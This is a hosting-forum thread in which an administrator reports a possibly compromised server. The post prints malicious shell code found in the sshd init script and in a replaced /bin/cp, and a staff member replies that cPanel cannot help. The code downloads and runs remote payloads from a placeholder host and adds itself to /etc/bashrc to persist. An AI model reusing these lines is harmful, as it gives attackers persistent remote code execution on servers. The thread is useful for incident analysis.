Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Server Possibly Compromised

Discussion in 'Security' started by mordormx, Feb 17, 2016.

  1. mordormx

    mordormx Registered

    Joined:
    Nov 6, 2006
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    151
    Hi guys
    today i detect some weird lines in /etc/init.d/sshd at the start function, this is the content

    Code:
    start()
    
    {
    
    [ -x $SSHD ] || exit 5
    
    [ -f /etc/ssh/sshd_config ] || exit 6
    
    # Create keys if necessary
    
    if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
    
    do_rsa_keygen
    
    if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
    
    do_rsa1_keygen
    
    do_dsa_keygen
    
    fi
    
    fi
    
    
    
    
    
    Inject='/etc/bashrc' #/etc/bashrc
    
    Bar='/bin/bar' #/bin/bar
    
    
    if [[ ! -a $Bar ]]; then
    
    wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
    
    chmod 755 bar >/dev/null 2>&1
    
    mv bar $Bar >/dev/null 2>&1
    
    fi;
    
    if ! grep -q $Bar $Inject; then
    
    echo -e "$Bar >/dev/null 2>&1" >> $Inject
    
    fi;
    
    
    if [[ ! grep -q "example.com" /bin/cp ]]; then
    
    cp /bin/cp /bin/copy >/dev/null 2>&1
    
    echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nph
    
    p run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
    
    chmod 755 /bin/cp
    
    fi;
    
    
    Now the content of /bin/cp is
    #!/bin/bash
    
    Inject="/etc/bashrc" #/etc/bashrc
    
    Bar="/bin/bar" #/bin/bar
    
    if [[ ! -a $Bar ]]; then
    
    wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
    
    chmod 755 bar >/dev/null 2>&1
    
    mv bar $Bar >/dev/null 2>&1
    
    fi;
    
    if ! grep -q "$Bar" $Inject; then
    
    echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
    
    fi;
    
    copy
    
    Have any of you experienced this?
    
    Checking this URL http://example.com/Dynamic/g/run.txt
    looks like a very dangerous code, now i have to research for the way it happened.
    
    Any advice or comment?
     
    #1 mordormx, Feb 17, 2016
    Last edited by a moderator: Feb 17, 2016
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    16,309
    Likes Received:
    393
    Trophy Points:
    583
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Please don't post actual links or domain names in your posts. Especially those to compromised servers.

    cPanel is unable to assist you with a compromised server, you should seek the assistance of a professional about this.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    SysSachin likes this.
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice